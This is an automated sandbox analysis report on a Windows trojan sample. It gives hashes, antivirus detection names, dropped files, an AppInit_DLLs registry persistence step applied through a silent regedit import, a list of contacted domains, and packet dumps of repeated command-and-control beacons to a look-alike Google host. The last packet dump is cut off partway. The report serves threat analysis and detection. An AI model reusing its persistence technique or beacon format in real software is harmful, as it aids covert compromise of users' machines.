Analysis Date2014-10-30 18:35:52
MD5c4f8e8d5faa32c88e8c7c03759ac89e8
SHA17fb327d226ed1c4b8030f960b040c1d7d08eb134

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 250f4030c49268d9205a53e6f565d50c sha1: b0a1b4bb9140ef4b796f4c59da09376097848c9b size: 157696
Section.rdata md5: ff5cb439f4c7878161d4e857b09051f7 sha1: 8144833e6cad0037a65a36dc3ed68c22e7ac4de6 size: 7680
Section.data md5: 9b7704ce3ace5cac40afd67fd7d42d52 sha1: adbd4f37787e77e5b918853f2e494e81c6f6e56a size: 3584
Section.rsrc md5: 256bfec65677ea599be1575c36da167d sha1: ecd44588abfb39f79e0c7e212c66ee057daca1dd size: 22016
Timestamp2012-10-11 16:27:16
PackerMicrosoft Visual C++ ?.?
PEhashb1f7cfd3d1bdbfa2ee7fc4bc4425409566d765b3
IMPhash735953b115e04e85bbbbc14014a84ffc
AV360 SafeGen:Variant.Symmi.5161
AVAd-AwareGen:Variant.Symmi.5161
AVAlwil (avast)Vundo-XR [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Cidox.A.gen!Eldorado
AVAvira (antivir)TR/Dropper.Gen
AVBullGuardGen:Variant.Symmi.5161
AVCA (E-Trust Ino)Win32/Vundo.N!generic
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. WebTrojan.Mayachok.17986
AVEmsisoftGen:Variant.Symmi.5161
AVEset (nod32)Win32/Kryptik.ANAN
AVFortinetW32/Citirevo.AD!tr
AVFrisk (f-prot)W32/Cidox.A.gen!Eldorado
AVF-SecureGen:Variant.Symmi.5161
AVGrisoft (avg)BackDoor.Generic15.CNKV
AVIkarusTrojan-Downloader.Win32.Vundo
AVK7Riskware ( 0040eff71 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Agent
AVMcafeeVundo.gen.fg
AVMicrosoft Security EssentialsTrojanDropper:Win32/Vundo.V
AVMicroWorld (escan)Gen:Variant.Symmi.5161
AVNormanGen:Variant.Symmi.5161
AVRisingno_virus
AVSophosno_virus
AVSymantecTrojan.Gen.2
AVTrend Microno_virus
AVVirusBlokAda (vba32)Trojan.Genome.sb

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
Creates FileC:\WINDOWS\system32\hvifctm.dll
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNSclickbeta.ru
Winsock DNS91.220.35.154
Winsock DNSveroconma.com
Winsock DNSterrans.su
Winsock DNStheloamva.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdentagod.com
Winsock DNSdenareclick.com
Winsock DNSdebijonda.com
Winsock DNSfescheck.com
Winsock DNSinstrango.com
Winsock DNSliteworns.com
Winsock DNSgetintsu.com
Winsock DNSvengibit.com
Winsock DNStryangets.com
Winsock DNSnetrovad.com
Winsock DNSnshouse1.com
Winsock DNSvornedix.com
Winsock DNSinzavora.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\hvifctm.dll\\x00

Network Details:

DNSdebijonda.com
Type: A
141.8.225.80
DNSveroconma.com
Type: A
74.117.179.241
DNStheloamva.com
Type: A
141.8.225.80
DNSvornedix.com
Type: A
141.8.225.80
DNSdentagod.com
Type: A
141.8.225.80
DNSliteworns.com
Type: A
141.8.225.80
DNSvengibit.com
Type: A
141.8.225.80
DNStryangets.com
Type: A
141.8.225.80
DNSgetintsu.com
Type: A
141.8.225.80
DNSgetavodes.com
Type: A
141.8.225.80
DNStryatdns.com
Type: A
141.8.225.80
DNSfescheck.com
Type: A
209.222.14.3
DNSinzavora.com
Type: A
141.8.225.80
DNSinstrango.com
Type: A
DNSnetrovad.com
Type: A
DNSterrans.su
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3627&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg4D2fFZRaGZuon8QGdwfynnBzNBmnrz+Sgfr6vLxETbz
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3627&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg4D2fFZRaGZuon8QGdwfynnBzNBmnrz+Stgozuca1aWN
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3627&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg4D2fFZRaGZuon8QGdwfynnBzNBmnrz+Stgozuca1aWN
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3627&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg4D2fFZRaGZuon8QGdwfynnBzNBmnrz+SsDc0FplwrD+
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3627&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg4D2fFZRaGZuon8QGdwfynnBzNBmnrz+SsDc0FplwrD+
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3627&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg4D2fFZRaGZuon8QGdwfynnBzNBmnrz+SichPeJhawa8
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3627&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg4D2fFZRaGZuon8QGdwfynnBzNBmnrz+Sp/i363jC6pv
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3627&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg4D2fFZRaGZuon8QGdwfynnBzNBmnrz+Sp/i363jC6pv
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3627&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg4D2fFZRaGZuon8QGdwfynnBzNBmnrz+Sp/i363jC6pv
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3627&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg4D2fFZRaGZuon8QGdwfynnBzNBmnrz+SoqNO1yHxv2m
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3627&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg4D2fFZRaGZuon8QGdwfynnBzNBmnrz+SvHU033HWVlo
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3627&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg4D2fFZRaGZuon8QGdwfynnBzNBmnrz+SrZ8GV/nFogF
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3627&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg4D2fFZRaGZuon8QGdwfynnBzNBmnrz+Sp/i363jC6pv
User-Agent:
HTTP GEThttp://analystics.google.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3627&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg4D2fFZRaGZuon8QGdwfynnBzNBmnrz+Sl3uvaUxO+BZ
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1032 ➝ 74.117.179.241:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1040 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1041 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1042 ➝ 209.222.14.3:80
Flows TCP192.168.1.1:1043 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1044 ➝ 91.220.35.154:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36323726   XX0000&key=3627&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 44326646 5a526147 5a756f6e   Wyg4D2fFZRaGZuon
0x000000b0 (00176)   38514764 7766796e 6e427a4e 426d6e72   8QGdwfynnBzNBmnr
0x000000c0 (00192)   7a2b5367 66723676 4c784554 627a2048   z+Sgfr6vLxETbz H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36323726   XX0000&key=3627&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 44326646 5a526147 5a756f6e   Wyg4D2fFZRaGZuon
0x000000b0 (00176)   38514764 7766796e 6e427a4e 426d6e72   8QGdwfynnBzNBmnr
0x000000c0 (00192)   7a2b5374 676f7a75 63613161 574e2048   z+Stgozuca1aWN H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36323726   XX0000&key=3627&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 44326646 5a526147 5a756f6e   Wyg4D2fFZRaGZuon
0x000000b0 (00176)   38514764 7766796e 6e427a4e 426d6e72   8QGdwfynnBzNBmnr
0x000000c0 (00192)   7a2b5374 676f7a75 63613161 574e2048   z+Stgozuca1aWN H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36323726   XX0000&key=3627&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 44326646 5a526147 5a756f6e   Wyg4D2fFZRaGZuon
0x000000b0 (00176)   38514764 7766796e 6e427a4e 426d6e72   8QGdwfynnBzNBmnr
0x000000c0 (00192)   7a2b5373 44633046 706c7772 442b2048   z+SsDc0FplwrD+ H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36323726   XX0000&key=3627&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 44326646 5a526147 5a756f6e   Wyg4D2fFZRaGZuon
0x000000b0 (00176)   38514764 7766796e 6e427a4e 426d6e72   8QGdwfynnBzNBmnr
0x000000c0 (00192)   7a2b5373 44633046 706c7772 442b2048   z+SsDc0FplwrD+ H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36323726   XX0000&key=3627&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 44326646 5a526147 5a756f6e   Wyg4D2fFZRaGZuon
0x000000b0 (00176)   38514764 7766796e 6e427a4e 426d6e72   8QGdwfynnBzNBmnr
0x000000c0 (00192)   7a2b5369 63685065 4a686177 61382048   z+SichPeJhawa8 H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36323726   XX0000&key=3627&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 44326646 5a526147 5a756f6e   Wyg4D2fFZRaGZuon
0x000000b0 (00176)   38514764 7766796e 6e427a4e 426d6e72   8QGdwfynnBzNBmnr
0x000000c0 (00192)   7a2b5370 2f693336 336a4336 70762048   z+Sp/i363jC6pv H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36323726   XX0000&key=3627&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 44326646 5a526147 5a756f6e   Wyg4D2fFZRaGZuon
0x000000b0 (00176)   38514764 7766796e 6e427a4e 426d6e72   8QGdwfynnBzNBmnr
0x000000c0 (00192)   7a2b5370 2f693336 336a4336 70762048   z+Sp/i363jC6pv H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36323726   XX0000&key=3627&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 44326646 5a526147 5a756f6e   Wyg4D2fFZRaGZuon
0x000000b0 (00176)   38514764 7766796e 6e427a4e 426d6e72   8QGdwfynnBzNBmnr
0x000000c0 (00192)   7a2b5370 2f693336 336a4336 70762048   z+Sp/i363jC6pv H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36323726   XX0000&key=3627&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 44326646 5a526147 5a756f6e   Wyg4D2fFZRaGZuon
0x000000b0 (00176)   38514764 7766796e 6e427a4e 426d6e72   8QGdwfynnBzNBmnr
0x000000c0 (00192)   7a2b536f 714e4f31 79487876 326d2048   z+SoqNO1yHxv2m H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36323726   XX0000&key=3627&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 44326646 5a526147 5a756f6e   Wyg4D2fFZRaGZuon
0x000000b0 (00176)   38514764 7766796e 6e427a4e 426d6e72   8QGdwfynnBzNBmnr
0x000000c0 (00192)   7a2b5376 48553033 33485756 6c6f2048   z+SvHU033HWVlo H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36323726   XX0000&key=3627&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 44326646 5a526147 5a756f6e   Wyg4D2fFZRaGZuon
0x000000b0 (00176)   38514764 7766796e 6e427a4e 426d6e72   8QGdwfynnBzNBmnr
0x000000c0 (00192)   7a2b5372 5a384756 2f6e466f 67462048   z+SrZ8GV/nFogF H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36323726   XX0000&key=3627&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
